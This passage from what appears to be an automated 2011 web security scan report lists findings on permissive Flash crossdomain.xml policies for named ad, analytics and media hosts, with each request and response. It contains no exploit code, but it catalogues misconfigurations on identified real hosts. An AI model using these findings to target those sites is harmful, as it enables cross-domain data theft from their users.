Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:58:35 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Sun, 11 Sep 2011 00:58:35 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.37. https://socialize.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://socialize.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: socialize.gigya.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:0"
Server: Microsoft-IIS/7.5
X-Server: web517
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
Date: Sun, 04 Sep 2011 01:18:42 GMT
Connection: close
Content-Length: 341

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.38. http://statse.webtrendslive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:8a2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:58:31 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.39. http://sync.adap.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.adap.tv

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Connection: close
Content-Length: 204

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic
...[SNIP]...

6.40. http://sync.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x1 pid 0x24ad 9389
Set-Cookie: ts=1315097753; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:55:53 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.41. http://tags.bluekai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:13:13 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "1d83ce-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

6.42. http://tcr.tynt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/xml
Date: Sun, 04 Sep 2011 01:04:39 GMT
ETag: "251523935"
Expires: Sun, 04 Sep 2011 01:34:39 GMT
Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT
Server: EOS (lax001/54F8)
X-Cache: HIT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.43. http://trc.taboolasyndication.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: trc.taboolasyndication.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 01:01:04 GMT
Content-Type: text/xml
Content-Length: 409
Last-Modified: Sun, 10 Jul 2011 17:16:59 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

6.44. http://turn.nexac.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://turn.nexac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: turn.nexac.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 00:57:26 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 00:57:25 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.45. http://usatoday1.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:37 GMT
Server: Omniture DC/2.0.0
xserver: www166
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.46. http://wa.proflowers.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.proflowers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wa.proflowers.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:07:03 GMT
Server: Omniture DC/2.0.0
xserver: www625
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.47. http://www.wunderground.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:10:55 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Thu, 26 May 2011 00:03:43 GMT
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.48. http://adadvisor.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:48 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

6.49. http://ads.adbrite.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: none
Content-Type: text/x-cross-domain-policy
Date: Sun, 04 Sep 2011 00:57:22 GMT
Server: XPEHb/1.0
Content-Length: 398
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

6.50. http://cim.meebo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cim.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cim.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:08:38 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 303
Last-Modified: Tue, 09 Aug 2011 21:34:10 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
...[SNIP]...

6.51. http://cm.npc-mcclatchy.overture.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cm.npc-mcclatchy.overture.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 639
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

6.52. http://content.usatoday.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT
Accept-Ranges: bytes
ETag: "c3bb41117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:05 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.53. http://grfx.cstv.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://grfx.cstv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: grfx.cstv.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1717425046"
Last-Modified: Tue, 30 Aug 2011 23:41:52 GMT
Content-Length: 909
Server: lighttpd/1.4.19
Date: Sun, 04 Sep 2011 00:45:18 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.fansonly.com" />
<allow-access-from domain="*.initinteractive.com" />
<allow-access-from domain="174.132.109.106" />
<allow-access-from domain="*.cstv.com" />
<allow-access-from domain="*.ocsn.com" />
<allow-access-from domain="*.collegesports.com" />
<allow-access-from domain="livestats.*.fansonly.com" />
<allow-access-from domain="livestats.*.cstv.com" />
<allow-access-from domain="livestats.*.collegesports.com" />
<allow-access-from domain="*.rolltide.com" />
<allow-access-from domain="*.ucirvinesports.com" />
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="flv.sales.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mediapm.edgesuite.net" secure="false" />
...[SNIP]...

6.54. http://mi.adinterax.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mi.adinterax.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mi.adinterax.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=7776000
Date: Sun, 04 Sep 2011 00:59:10 GMT
Content-Length: 708
Content-Type: application/xml
Expires: Tue, 08 Nov 2011 10:18:21 GMT
Last-Modified: Thu, 02 Sep 2010 20:10:03 GMT
Accept-Ranges: bytes
Server: Footprint Distributor V4.6
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com" />
<allow-access-from domain="adinterax.cnet.com.edgesuite.net" />
<allow-access-from domain="adinterax.myspace.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

6.55. http://optimized-by.rubiconproject.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:59 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

6.56. http://rd.meebo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rd.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: rd.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:10:35 GMT
Content-Type: text/xml; charset=utf8
Content-Length: 91
Last-Modified: Wed, 26 Jan 2011 19:56:05 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
   <allow-access-from domain="*.meebo.com"/>
</cross-domain-policy>

6.57. http://snas.nbcuni.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: snas.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
Last-Modified: Fri, 17 Dec 2010 18:25:22 GMT
ETag: "2c9cd-58b-4979f4b136880"
Accept-Ranges: bytes
Content-Length: 1419
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:53:36 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*.ivillage.com" /><allow-access-from domain="*.nbbcdev.com" /><allow-access-from domain="*.bravotv.com" /><allow-access-from domain="*.console.net" /><allow-access-from domain="*.digphilly.com"/><allow-access-from domain="*.nbc10rss.com"/><allow-access-from domain="*.nbc10.com"/><allow-access-from domain="*.scifi.com"/><allow-access-from domain="*.weatherplus.com" /><allow-access-from domain="*.nbcuxd.com" /><allow-access-from domain="vplayer-preview-dev.nbcuni.ge.com" /><allow-access-from domain="*.industrynext.com"/><allow-access-from domain="*.nbcuni.com"/><allow-access-from domain="widgets.nbcuni.com"/><allow-access-from domain="*.nbc.com"/><allow-access-from domain="*.thetonightshowwithconan.com"/><allow-access-from domain="*.tonightshowwithconanobrien.com"/><allow-access-from domain="*.thetonightshowwithconanobrien.com"/><allow-access-from domain="*.tonightshow.com" /><allow-access-from domain="*.tonightshowwithconan.com" /><allow-access-from domain="*.latenightwithjimmyfallon.com" /><allow-access-from domain="*.ingaylewetrust.com" /><allow-access-from domain="*.thejaylenoshow.com" /><allow-access-from domain="127.0.0.1"/><allow-access-from domain="localhost"/><allow-access-from domain="*.sudjam.com"/>
...[SNIP]...

6.58. http://syndication.mmismm.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: syndication.mmismm.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:13:34 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2011 02:20:52 GMT
ETag: "10e-4a8db76d7c900"
Accept-Ranges: bytes
Content-Length: 270
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...

6.59. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.62.155.33
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

6.60. http://www.meebo.com/crossdomain.xml

Summary

Severity:   Low
